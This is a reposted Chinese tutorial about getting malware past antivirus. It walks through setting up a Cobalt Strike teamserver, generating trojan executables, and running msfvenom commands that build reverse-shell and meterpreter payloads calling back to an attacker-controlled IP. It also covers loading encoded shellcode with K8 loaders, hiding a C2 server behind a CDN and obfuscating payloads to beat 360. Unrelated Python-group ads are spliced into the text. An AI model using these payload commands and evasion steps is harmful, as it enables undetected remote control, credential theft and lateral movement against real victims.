ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

杀毒与免杀技术详解---白嫖党福音

2021-01-15 14:02:40  阅读:1151  来源: 互联网

标签:免杀 生成 --- 木马 msf 白嫖党 payload 加载


简介

不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑

 

免杀进而实现我们渗透测试目的。

概念

1.1 免杀类别

简单总结下我知道的免杀类别:

一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来)

文件不落地
shellcode加密
修改源码增加花指令
DLL加载
自定义加载器
指定特定的运行方式
加壳

 

当然还可以按照大的类别划分

 

静态扫描免杀
内存扫描免杀
流量分析免杀
行为分析免杀
逆向分析免杀
机器学习免杀

 

由于弟弟水平有限,知道的东西很少(流量分析,逆向分析一点不懂,机器学习更是一脸懵逼),望哥哥们见谅,当然最好能留下些建议或者私下能和弟弟交流下。

1.2 免杀工具

推荐一些公开流传的k8工具:

 

文字:

sc加载器(具体下面有介绍)
K8免杀系统自带捆绑器加强版V2.0
K8数字签名添加器
K8随机免杀花指令生成器V2.0(只是生成花指令)

 

图片:

在这里插入图片描述

大概的总结下k8工具过免杀思路吧:

1.sc加载器实现绕过,原理在于加密
2.利用其他安全软件的数字签名,进行绕过
3.捆绑正常的软件,进行绕过
4.增加没有实用效果的花指令进行绕过(花指令需要自己加然后编译)

 

既然是免杀,当然不能忘记cs:


cs(Cobalt Strike)的话我只有三个版本,v3的两个版本,还有v4.0的,cs是一个强大的免杀工具,并且支持c2在线团队使用。对于很多大佬来说肯定是十分熟悉

的,弟弟我只能简单的介绍下其简介:

 

cs拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,cs还可以调用Mimikatz等其他知

名工具。

实践

说的再多也不如拿真实情况来说话,实践主要对上述的六种工具做下简单的使用,并利用线上沙箱进行简单的查杀检测。

2.1:Cobalt Strike-3.12

因为是浅谈,再有就是我实在是太懒了,能缩水就缩水,求饶过别打我。

 

2.1.1:安装sever

 

我用的啊某云的云当的sever,这里需要注意的是只能用linux的,并且安装好java,3.12的有不同的包,而4.0的只有一个包。接下来主要以3.12为主。


在这里插入图片描述

2.1.2:启动sever

启动的格式:

./teamserver <host> <password>

 

在这里插入图片描述


2.1.3:启动client


在这里插入图片描述
在这里插入图片描述

很多人学习python,不知道从何学起。


很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。


很多已经做案例的人,却不知道如何去学习更加高深的知识。


那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!


QQ群:810735403

 

2.1.4:建立一个监听

 

根据自己的需要建立一个监听


在这里插入图片描述
在这里插入图片描述


2.1.5:生成一个exe


当然还可以生成别的,这里只做测试,简略操作,不然光cs就能写一个系列。

 

在这里插入图片描述


当然还有其他格式的木马

 

HTML Application        生成恶意的HTA木马文件;
MS Office Macro        生成office宏病毒文件;
Payload Generator       生成各种语言版本的payload;
USB/CD AutoPlay         生成利用自动播放运行的木马文件;
Windows Dropper         捆绑器,能够对文档类进行捆绑;
Windows Executable      生成可执行exe木马;
Windows Executable(S)    生成无状态的可执行exe木马

 

2.1.6:目标上线


在这里插入图片描述


之后就可以实远控了,轻则控制桌面,重则横向,获取域控,但要时刻谨记网络安全法,做有授权合法的渗透。

放张图,自己看:


在这里插入图片描述

2.1.7:在线沙盒查杀


直接放个查杀结果连接:


在线查杀结果

 

2.1.8:总结

 

为了更加真实我用的本机打开的木马,火狐全程无提醒,但是通过流量分析和走向能发现。
在这里插入图片描述
这里是能获取到远程ip的,但是如果我们换个骚思路,加个cdn,他还咋发现emmm。当然cs的功能还有很多,这里只做简单介绍。

2.2 k8工具

k8工具,流传的比较广,因此有些免杀效果一般,而sc加载器利用原理不外乎是加密。

2.2.1:罗列下工具

[+] 免杀工具 scrunBase64 ShellCode免杀加载器(CS & MSF)
[+] 免杀工具 scrunBase32 ShellCode免杀加载器(CS & MSF)
[+] 免杀工具 scrun.exe & scrun.py ShellCode免杀加载器(CS & MSF)
[+] 免杀工具 K8SCENCODE(CS & Msf免杀工具).rar
[+] 免杀工具 K8随机免杀花指令生成器V2.0.exe
[+] 免杀工具 K8数字签名添加器.exe
[+] 捆绑工具 K8免杀系统自带捆绑器加强版V2.0.EXE

接下来主要说下sc加载器,因为其他的捆绑或者数字签名软件完全是傻瓜操作,花指令更是知识和生成花指令,编译还得自己整,当时做的截图找不

到了,我也不想再做一遍了。。。

 

2.2.2:利用msf生成个shellcode先(用cs也可以)

 

msf生成shellcode命令:

 

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c

 

在这里插入图片描述


2.2.3:将shellcode转化为hex格式,再利用sc加载器加载:


在这里插入图片描述


2.2.4:msf发现上线


在这里插入图片描述


2.2.5:在线沙盒查杀

用的txt,因为是无文件落地:
在线查杀结果

 

2.2.6:总结

简单的说下优缺点吧:

 

优点:无文件落地,避免了防火墙,无样本可以分析。


缺点:需要sc加载器,不然没效果,不落地方案操作会被提醒。

2.3 msf生成木马

这个应该很简单吧,做下简单介绍吧,如果想利用更的操作,可以show paload,根据自己需求。

2.3.1 生成exe木马


生成命令:

msf -p windows/shell_reverse_tcp LHOST=192.168.111.139 LPORT=1235 -e x86/shikata_ga_nai -i 12 -b '\x00' -f exe > shell.exe

 

附图:
在这里插入图片描述


为了照顾新加入的哥哥,贴下msf opthions:

 

-p, —payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-'或者stdin指定
-l, —list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, —nopsled 为payload预先指定一个NOP滑动长度
-f, —format 指定输出格式 (使用 —help-formats 来获取msf支持的输出格式列表)
-e, —encoder [encoder] 指定需要使用的encoder(编码器)
-a, —arch 指定payload的目标架构
—platform 指定payload的目标平台
-s, —space 设定有效攻击荷载的最大长度
-b, —bad-chars 设定规避字符集,比如: ‘\x00\xff’
-i, —iterations 指定payload的编码次数
-c, —add-code 指定一个附加的win32 shellcode文件
-x, —template 指定一个自定义的可执行文件作为模板
-k, —keep 保护模板程序的动作,注入的payload作为一个新的进程运行
—payload-options 列举payload的标准选项
-o, —out 保存payload
-v, —var-name 指定一个自定义的变量,以确定输出格式
—shellest 最小化生成payload
-h, —help 查看帮助选项
—help-formats 查看msf支持的输出格式列表

2.3.2:在线查杀


附上在线查结果连接:


在线查杀结果

 

如果想要绕过更多杀软,例如360,可以进行加盐处理,就是生成c语言shellcode,之后添加无用的东西。

 

2.3.3:总结

 

Metasploit是最为常用的渗透框架,他包含了世界上最大而且经过测试攻击的代码数据库。所以,熟练掌握Metasploit也是一个渗透人员的基本功吧,所

以这个地方没写 太多。


免杀原理:利用msf加载器,对我们攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出


优点:操作简单,代码数据库多。


局限:不适合团队合作使用,在真实对抗中,需要实现长期维持的目的,因此更会有倾向的选择相应工具,包括c2框架(弟弟单纯的想法,如有错误,请

哥哥们指正)

2.4 其他c2框架生成shellcode

除了cs,msf以外我个人还比较喜欢用帝国(empire),当然还是根据个人喜好来,我会附上几款read-team框架供哥哥们参考,在此不做赘述。

在这里还是要推荐下我自己建的Python开发交流学习(qq)群:810735403,群里都是学Python开发的,如果你正在学习Python ,欢迎你加入,大

家都是软件开发党,不定期分享干货(只有Python软件开发相关的),包括我自己整理的一份2021最新的Python进阶资料和高级开发教程,欢迎进阶中

和想深入Python的小伙伴!

标签:免杀,生成,---,木马,msf,白嫖党,payload,加载
来源: https://www.cnblogs.com/peig/p/14281696.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有